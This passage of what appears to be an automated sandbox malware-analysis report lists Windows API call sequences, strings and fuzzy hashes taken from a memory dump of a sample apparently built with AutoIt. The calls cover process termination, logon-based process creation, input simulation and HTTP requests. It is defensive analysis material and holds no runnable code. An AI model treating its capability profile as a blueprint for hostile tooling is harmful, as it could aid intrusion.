                    • GetMenuItemCount.USER32(000000FF), ref: 007B2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007B2875
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0075179A
                    • GetWindowRect.USER32(?,?), ref: 007517FE
                    • ScreenToClient.USER32(?,?), ref: 0075181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0075182C
                    • EndPaint.USER32(?,?), ref: 00751876
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    APIs
                    • ShowWindow.USER32(008167B0,00000000,011E53C0,?,?,008167B0,?,007DB862,?,?), ref: 007DB9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 007DB9F0
                    • ShowWindow.USER32(008167B0,00000000,011E53C0,?,?,008167B0,?,007DB862,?,?), ref: 007DBA50
                    • ShowWindow.USER32(00000000,00000004,?,007DB862,?,?), ref: 007DBA62
                    • EnableWindow.USER32(00000000,00000001), ref: 007DBA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007DBAA9
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,007C5134,?,?,00000000,00000001), ref: 007C73BF
                      • Part of subcall function 007C3C94: GetWindowRect.USER32(?,?), ref: 007C3CA7
                    • GetDesktopWindow.USER32 ref: 007C73E9
                    • GetWindowRect.USER32(00000000), ref: 007C73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007C7422
                      • Part of subcall function 007B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                    • GetCursorPos.USER32(?), ref: 007C744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007C74AC
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    APIs
                      • Part of subcall function 007A85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A8608
                      • Part of subcall function 007A85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A8612
                      • Part of subcall function 007A85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A8621
                      • Part of subcall function 007A85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A8628
                      • Part of subcall function 007A85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A863E
                    • GetLengthSid.ADVAPI32(?,00000000,007A8977), ref: 007A8DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007A8DB8
                    • HeapAlloc.KERNEL32(00000000), ref: 007A8DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 007A8DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,007A8977), ref: 007A8DEC
                    • HeapFree.KERNEL32(00000000), ref: 007A8DF3
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007A8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 007A8B31
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007A8B40
                    • CloseHandle.KERNEL32(00000004), ref: 007A8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007A8B7A
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 007A8B8E
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    APIs
                      • Part of subcall function 007512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                      • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075135C
                      • Part of subcall function 007512F3: BeginPath.GDI32(?), ref: 00751373
                      • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007DC1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 007DC1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DC1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 007DC1F6
                    • EndPath.GDI32(00000000), ref: 007DC206
                    • StrokePath.GDI32(00000000), ref: 007DC216
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007703D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 007703DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007703E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007703F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 007703F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00770401
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007B569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007B56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 007B56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B56E0
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 007B74E5
                    • EnterCriticalSection.KERNEL32(?,?,00761044,?,?), ref: 007B74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00761044,?,?), ref: 007B7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00761044,?,?), ref: 007B7510
                      • Part of subcall function 007B6ED7: CloseHandle.KERNEL32(00000000,?,007B751D,?,00761044,?,?), ref: 007B6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7523
                    • LeaveCriticalSection.KERNEL32(?,?,00761044,?,?), ref: 007B752A
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007A8E7F
                    • UnloadUserProfile.USERENV(?,?), ref: 007A8E8B
                    • CloseHandle.KERNEL32(?), ref: 007A8E94
                    • CloseHandle.KERNEL32(?), ref: 007A8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007A8EA5
                    • HeapFree.KERNEL32(00000000), ref: 007A8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                    • Instruction ID: c9e9d49794aab6145ce7aa3a184005001cf46356b467754013e4e72bc4e0eef9
                    • Opcode Fuzzy Hash: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                    • Instruction Fuzzy Hash: 9EE0C236105005FBDA012FE5EC0C94ABF79FB89322B50C232F21A81170CB3A9820DB58
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C32
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C4A
                    • CLSIDFromProgID.OLE32(?,?,00000000,007DFB80,000000FF,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7C6F
                    • _memcmp.LIBCMT ref: 007A7C90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID: ,,~
                    • API String ID: 314563124-1083855107
                    • Opcode ID: 25d6196784aca546f019fc53695bc8e6c3541248cdb2e108abab0272147c3045
                    • Instruction ID: a315bf806007a10576dfba5dda8fbba4482d199b8c58deff541c93a5ffe3bbd6
                    • Opcode Fuzzy Hash: 25d6196784aca546f019fc53695bc8e6c3541248cdb2e108abab0272147c3045
                    • Instruction Fuzzy Hash: E8810CB1A00109EFCB04DF94C984EEEB7B9FF89315F204599F516AB250DB75AE06CB60
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 007C8928
                    • CharUpperBuffW.USER32(?,?), ref: 007C8A37
                    • VariantClear.OLEAUT32(?), ref: 007C8BAF
                      • Part of subcall function 007B7804: VariantInit.OLEAUT32(00000000), ref: 007B7844
                      • Part of subcall function 007B7804: VariantCopy.OLEAUT32(00000000,?), ref: 007B784D
                      • Part of subcall function 007B7804: VariantClear.OLEAUT32(00000000), ref: 007B7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 92e7798c89a295abb1de80bd34366f460ce54b2dfd277a15a6252fd98ad106b9
                    • Instruction ID: a1e17487c92abffa88426132d780584de431be90ee7b65aa07073772561d2b94
                    • Opcode Fuzzy Hash: 92e7798c89a295abb1de80bd34366f460ce54b2dfd277a15a6252fd98ad106b9
                    • Instruction Fuzzy Hash: E6916CB5608301DFC754DF24C484E5ABBE4EF89314F04896EF99A8B361DB38E909CB52
                    APIs
                      • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                    • _memset.LIBCMT ref: 007B3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007B3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: 9f9c040ab0bf7ec1bb1038f340af02269e4d1f80a54cf40beef417e0369475e3
                    • Instruction ID: aa5b71d039dbe1abc597c72c3a7678a217711a1ca0b522f03c721e97cdb2f8dd
                    • Opcode Fuzzy Hash: 9f9c040ab0bf7ec1bb1038f340af02269e4d1f80a54cf40beef417e0369475e3
                    • Instruction Fuzzy Hash: 6C51F2316097089AD714AF28C849BEBB7E9EF44360F044A2DF895D3191EB78CE85C752
                    APIs
                    • _memset.LIBCMT ref: 007B2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007B2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 007B2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00816890,00000000), ref: 007B2D5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                    • Instruction ID: ae975927ba7c6b4e14ad145effb99b42a37db193ad71563d934d4b96384043d3
                    • Opcode Fuzzy Hash: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                    • Instruction Fuzzy Hash: C341B4302063019FD714DF24D849B9BBBE4FF85320F14465EF96697292DB78E906CBA2
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CDAD9
                      • Part of subcall function 007579AB: _memmove.LIBCMT ref: 007579F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 5e684134f5e37ad44ea1947583e19d85a9129d466c10aeb94c441fe0ba60f307
                    • Instruction ID: a3cb418f35b7d611030d3e0ff669b5f33ad206164080fdd79f97aaac6832cac7
                    • Opcode Fuzzy Hash: 5e684134f5e37ad44ea1947583e19d85a9129d466c10aeb94c441fe0ba60f307
                    • Instruction Fuzzy Hash: EE317270600619EBCF20EFA4CC959EEB7B4FF05310B10862DE866A76D1DB75AD09CB90
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007A93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007A9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 007A9439
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: a5764715616588b82b82f2a9b188a59bca36ccf282882d12354af6b419d7c01f
                    • Instruction ID: 0b59d862ae501419f034b75bd22afaa5be4b32d1f958f975592c5c5e26b9ce13
                    • Opcode Fuzzy Hash: a5764715616588b82b82f2a9b188a59bca36ccf282882d12354af6b419d7c01f
                    • Instruction Fuzzy Hash: 1521E4B1A00104FEDB18AB74DC8ACFFB778DF46350B108219FA26972E1DB7D490A9620
                    APIs
                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C1B40
                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C1B66
                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007C1B96
                    • InternetCloseHandle.WININET(00000000), ref: 007C1BDD
                      • Part of subcall function 007C2777: GetLastError.KERNEL32(?,?,007C1B0B,00000000,00000000,00000001), ref: 007C278C
                      • Part of subcall function 007C2777: SetEvent.KERNEL32(?,?,007C1B0B,00000000,00000000,00000001), ref: 007C27A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                    • String ID:
                    • API String ID: 3113390036-3916222277
                    • Opcode ID: c435dcf97b12d6c50db58b02d6c7d390d421ec98ff0d02accadaf8609d14b08d
                    • Instruction ID: 1ab2b7f098c228eb887ddeecf90fa53ee8abccf35f074c0eccbce6dd159749be
                    • Opcode Fuzzy Hash: c435dcf97b12d6c50db58b02d6c7d390d421ec98ff0d02accadaf8609d14b08d
                    • Instruction Fuzzy Hash: 72218EB1500208BFEB119F609CC9FBB77FCEB4A754F50812EF506A6241EB289D059B61
                    APIs
                      • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                      • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                      • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007D66D0
                    • LoadLibraryW.KERNEL32(?), ref: 007D66D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007D66EC
                    • DestroyWindow.USER32(?), ref: 007D66F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 9a3fb58cd74794dc0bea08ee61c6e2150bc40358f0098e9ac2583fac8f7ba6c0
                    • Instruction ID: 17c8fbc9eb94374af053188353fe3354666381fa34e3e11e69085efd6e384c1d
                    • Opcode Fuzzy Hash: 9a3fb58cd74794dc0bea08ee61c6e2150bc40358f0098e9ac2583fac8f7ba6c0
                    • Instruction Fuzzy Hash: 31219D7120020AEFEF105F64EC80EBB37BDEF59368F10862AF951922A0D779CC519760
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 007B705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 007B70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007B70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 9a28d53cbdf8847e079c8dde2eb10fce30331c61afde1a27779be8a404536b80
                    • Instruction ID: 94d7f66e2936853ef01d3a93c04ff98e062c87c9db54005e9525992c06764176
                    • Opcode Fuzzy Hash: 9a28d53cbdf8847e079c8dde2eb10fce30331c61afde1a27779be8a404536b80
                    • Instruction Fuzzy Hash: EA215174604209AFDB24AF38DC09BEA77B8BF94720F20861AFDA1D72D0D7789950CB50
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 007B712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 007B716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007B71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 34bc275bf3644db9498c83c9c99e1f9c9bb8b2a2db8dc1f19f022c5e1d1b94f4
                    • Instruction ID: f8caef5ff0244f46bea2c13eabfbab7b3a09a1e2bc823d69ad0872d8010d1ffa
                    • Opcode Fuzzy Hash: 34bc275bf3644db9498c83c9c99e1f9c9bb8b2a2db8dc1f19f022c5e1d1b94f4
                    • Instruction Fuzzy Hash: 8221907560420DABDB249F6C9C04BEAB7B8BFD5720F204619F9A1D32D0D778A841CB64
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007BAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007BAF13
                    • __swprintf.LIBCMT ref: 007BAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,007DF910), ref: 007BAF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: b5a30ebd16c610a22291dae0b7c842d0a486a91597ff67678df004503bb07aa2
                    • Instruction ID: 418c0574649626deeb44b986c82a03017251bbb8861e6ab7f2e3bb75857be98b
                    • Opcode Fuzzy Hash: b5a30ebd16c610a22291dae0b7c842d0a486a91597ff67678df004503bb07aa2
                    • Instruction Fuzzy Hash: B6216270A00109EFCB10EF64C989EEE7BB8EF89704B008069F909DB251DB75EA45CB61
                    APIs
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                      • Part of subcall function 007AA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AA399
                      • Part of subcall function 007AA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA3AC
                      • Part of subcall function 007AA37C: GetCurrentThreadId.KERNEL32 ref: 007AA3B3
                      • Part of subcall function 007AA37C: AttachThreadInput.USER32(00000000), ref: 007AA3BA
                    • GetFocus.USER32 ref: 007AA554
                      • Part of subcall function 007AA3C5: GetParent.USER32(?), ref: 007AA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 007AA59D
                    • EnumChildWindows.USER32(?,007AA615), ref: 007AA5C5
                    • __swprintf.LIBCMT ref: 007AA5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: d678a122264c6eab733bcb878069dcb1fcab10b62820034282eac1820081146f
